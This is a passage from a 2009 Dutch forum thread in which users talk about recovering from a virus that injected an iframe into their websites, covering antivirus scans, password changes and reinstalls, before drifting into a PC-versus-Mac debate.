    Zoals ik eerder al vermelde, zorg eerst dat je eigen pc schoon is! Pleur je FTP programma er even af en draai verschillende virusprogramma's + spyware scanners.

    Daarna laat je eerst (of doe je zelf) je wachtwoorden wijzigen.. Deze zijn namelijk nu bekend bij het desbetreffende virus.. In de tussentijd laat je iemand wiens PC wél clean is even het iframe verwijderen.

    This should do...
    Ja, this should do, vergeet je niet dat dat ding (ik las ergens op google al 9x zoiets) zich soms terug zet na reboot
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71835346
    Tja, in theorie had ik me eigen pc al lang een herinstall gegeven... Maar heb zelf 14 hostingpakketten en daar heb ik nergens last van...
      woensdag 12 augustus 2009 @ 23:32:08 #273
    79166 Qwea
    #teampindakaas #viesdik
    pi_71835400
    quote:
    Op woensdag 12 augustus 2009 23:29 schreef St4ck3r het volgende:
    Tja, in theorie had ik me eigen pc al lang een herinstall gegeven... Maar heb zelf 14 hostingpakketten en daar heb ik nergens last van...
    mijne is mooi schoon na een nieuwe image terugzetten

    9 min, wast gebeurt
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      woensdag 12 augustus 2009 @ 23:35:17 #274
    111829 MissBliss
    Godin van SHO
    pi_71835481
    Mijn pc is ook schoon geloof ik.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71835568
    Geloven doen we in de kerk
      Redactie Games donderdag 13 augustus 2009 @ 00:18:23 #276
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71836614
    quote:
    Op woensdag 12 augustus 2009 21:23 schreef freud het volgende:
    Goeie site, je kan alleen niet zien in welke pagina de link zit
    Volgens is het altijd direct je index pagina. Zeker omdat je na de domeinnaam geen aparte bestandsnaam opgeeft.
    Houdt dus in je standaard index.php, htm, html, asp, nogwattes meuk..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
    pi_71837129
    quote:
    Op woensdag 12 augustus 2009 @ 23:38 schreef St4ck3r het volgende:
    Geloven doen we in de kerk
    Zeker weten kan ik het niet zonder format las ik in dit topic
    Ik merk het vanzelf wel als ik iets update op de site
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71837238
    Mijn website doet het weer
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      Redactie Games donderdag 13 augustus 2009 @ 01:07:00 #279
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71837624
    Eindelijk af van je DOA's...
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
    pi_71837920
    This page seems to be <clean>
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      FOK!-Schrikkelbaas donderdag 13 augustus 2009 @ 08:41:34 #281
    1972 Swetsenegger
    Egocentrische Narcist
    pi_71840333
    Dus... de oplossing was voor de meeste een complete reinstall van hun PC?
      donderdag 13 augustus 2009 @ 09:38:59 #282
    262 Re
    Kiss & Swallow
    pi_71841081
    quote:
    Op donderdag 13 augustus 2009 08:41 schreef Swetsenegger het volgende:
    Dus... de oplossing was voor de meeste een complete reinstall van hun PC?
    nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscan (clean install zou wellicht sneller gaan)
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      FOK!-Schrikkelbaas donderdag 13 augustus 2009 @ 09:40:43 #283
    1972 Swetsenegger
    Egocentrische Narcist
    pi_71841107
    quote:
    Op donderdag 13 augustus 2009 09:38 schreef Re het volgende:

    [..]

    nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscan (clean install zou wellicht sneller gaan)
    Christ...
      donderdag 13 augustus 2009 @ 10:37:06 #284
    22273 Dizer
    Save the beard!
    pi_71842306
    quote:
    Op donderdag 13 augustus 2009 09:38 schreef Re het volgende:

    [..]

    nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscan (clean install zou wellicht sneller gaan)
    Re... koop een Apple. Je speelt nooit spellen, en het enige wat je doet is FOTOGRAFIE!!!!!
    Weg met al het gezeur wat je altijd hebt op de computer. Weg met alle virussen die je telkens hebt....
    Weg met al je HD gezeur dat elke keer niet werkt, zet er 2 TB externe HD's naast..
    Weg met moederbord dat ontploft...



    24" LED Scherm
    2.66 GHZ dual core
    4 GB geheugen
    640 GB HD

    1399 incl BTW
    En voor 1699 incl BTW heb je een nog snellere!
    Friends don't let friends remain beardless...
      donderdag 13 augustus 2009 @ 10:38:59 #285
    79166 Qwea
    #teampindakaas #viesdik
    pi_71842349
    quote:
    Op donderdag 13 augustus 2009 08:41 schreef Swetsenegger het volgende:
    Dus... de oplossing was voor de meeste een complete reinstall van hun PC?
    nou, dat was hier wel de snelste manier ja Die malware bytes loopt per x 1u. Die antispywaredinges ook 1u, en die avast 45 min. En die moet je dan ook nog her runnen bij het booten, image terug zetten duurde 9 min
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      donderdag 13 augustus 2009 @ 10:41:10 #286
    79166 Qwea
    #teampindakaas #viesdik
    pi_71842400
    quote:
    Op donderdag 13 augustus 2009 10:37 schreef Dizer het volgende:

    [..]

    Re... koop een Apple. Je speelt nooit spellen, en het enige wat je doet is FOTOGRAFIE!!!!!
    Weg met al het gezeur wat je altijd hebt op de computer. Weg met alle virussen die je telkens hebt....
    Weg met al je HD gezeur dat elke keer niet werkt, zet er 2 TB externe HD's naast..
    Weg met moederbord dat ontploft...

    [ afbeelding ]

    24" LED Scherm
    2.66 GHZ dual core
    4 GB geheugen
    640 GB HD

    1399 incl BTW
    En voor 1699 incl BTW heb je een nog snellere!
    heb je weer zo'n apple ophemeler. Ik heb nooit een hdd gehad die niet werkte... ook is mn mobo niet ontploft. En zodra mac os X en linux meer in opmars komen net zoals de gewone pc/windows.... dan krijg je ook virussen.
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      donderdag 13 augustus 2009 @ 10:59:15 #287
    22273 Dizer
    Save the beard!
    pi_71842820
    quote:
    Op donderdag 13 augustus 2009 10:41 schreef Qwea het volgende:

    [..]

    heb je weer zo'n apple ophemeler. Ik heb nooit een hdd gehad die niet werkte... ook is mn mobo niet ontploft. En zodra mac os X en linux meer in opmars komen net zoals de gewone pc/windows.... dan krijg je ook virussen.
    Ja maar je kent Re niet en zijn computers. Nachtenlang heb ik er aan moeten werken elke keer
    Friends don't let friends remain beardless...
    pi_71842912
    Ik heb geen 1399 rondslingeren.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      donderdag 13 augustus 2009 @ 11:07:51 #289
    262 Re
    Kiss & Swallow
    pi_71843022
    ja ja, kan hem natuurlijk wel weer van de belastingen aftrekken
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      donderdag 13 augustus 2009 @ 11:24:57 #290
    79166 Qwea
    #teampindakaas #viesdik
    pi_71843502
    quote:
    Op donderdag 13 augustus 2009 11:07 schreef Re het volgende:
    ja ja, kan hem natuurlijk wel weer van de belastingen aftrekken
    Als je écht voor een mac gaat, neem dan die van 1699
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games donderdag 13 augustus 2009 @ 13:16:23 #291
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71846402
    quote:
    Op donderdag 13 augustus 2009 09:38 schreef Re het volgende:

    [..]

    nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscan (clean install zou wellicht sneller gaan)
    Snap je waarom mensen nu over gaan op Mac.. NoFi
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      FOK!-Schrikkelbaas donderdag 13 augustus 2009 @ 14:01:25 #292
    1972 Swetsenegger
    Egocentrische Narcist
    pi_71847722
    quote:
    Op donderdag 13 augustus 2009 10:41 schreef Qwea het volgende:

    [..]

    heb je weer zo'n apple ophemeler. Ik heb nooit een hdd gehad die niet werkte... ook is mn mobo niet ontploft. En zodra mac os X en linux meer in opmars komen net zoals de gewone pc/windows.... dan krijg je ook virussen.
    Dat laatste is onzin.. Het marktaandeel EN het feit dat praktisch geen enkele mac gebruiker een virusscanner heeft draaien is de natte droom van iedere virusschrijver. Het is blijkbaar verrekte moeilijk.

    Want als de wet van de grote aantallen gaan gelden is het een raadsel waarom voorheen Appache op iets van 94% van de webservers geinstalleerd was toch minder last had van hackpogingen dan het veel minder gebruikte IIS van microsoft.

    Waarmee ik niet wil zeggen dat er nooit een virus voor een Mac ZAL komen, maar het is in ieder geval niet zo vanzelfsprekend als gedacht wordt.

    Anyway, in dit geval lag het probleem meer bij adobe dan windows natuurlijk. Nijdig virusje....
      donderdag 13 augustus 2009 @ 14:09:35 #293
    262 Re
    Kiss & Swallow
    pi_71847993
    quote:
    Op donderdag 13 augustus 2009 13:16 schreef Mr.Noodle het volgende:

    [..]

    Snap je waarom mensen nu over gaan op Mac.. NoFi
    dat kan ongetwijfelt een reden zijn ja... aanschaffen weer nieuwe software is een tweede
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      donderdag 13 augustus 2009 @ 14:10:57 #294
    22273 Dizer
    Save the beard!
    pi_71848040
    quote:
    Op donderdag 13 augustus 2009 14:09 schreef Re het volgende:

    [..]

    dat kan ongetwijfelt een reden zijn ja... aanschaffen weer nieuwe software is een tweede
    Wehehehe.... nieuwe software... wheheheheheheeh .
    Je kent mij toch? En de rest is GRATIS want veel open source dingen .
    Friends don't let friends remain beardless...
    pi_71848635
    Dit is geen pc vs. Mac-topic!
    Doe dat maar ergens anders
    Virus is weg en zóveel moeite heeft het nou ook weer niet gekost hoor. Ik heb dinsdag een stuk of 5 virusscans gedraaid, maar dat is natuurlijk alleen een kwestie van op een knopje klikken en de rest gaat vanzelf. Een clean instal kost meer moeite
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      FOK!-Schrikkelbaas donderdag 13 augustus 2009 @ 16:26:33 #296
    1972 Swetsenegger
    Egocentrische Narcist
    pi_71851739
    Je bent een hele dag bezig geweest
    Nee kost weinig moeite, een dag productie kwijt.
    pi_71851845
    Ik zat toch thuis achter de pc (ik had vrij dinsdag).
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
    pi_71857287
    quote:
    Op donderdag 13 augustus 2009 16:26 schreef Swetsenegger het volgende:
    Je bent een hele dag bezig geweest
    Nee kost weinig moeite, een dag productie kwijt.
    Dat bedenk ik me dus ook (nog steeds ftp niet aangeraakt, macje komt maandag )
    abonnement Unibet Coolblue Bitvavo
    Forum Opties
    Forumhop:
    Hop naar:
    (afkorting, bv 'KLB')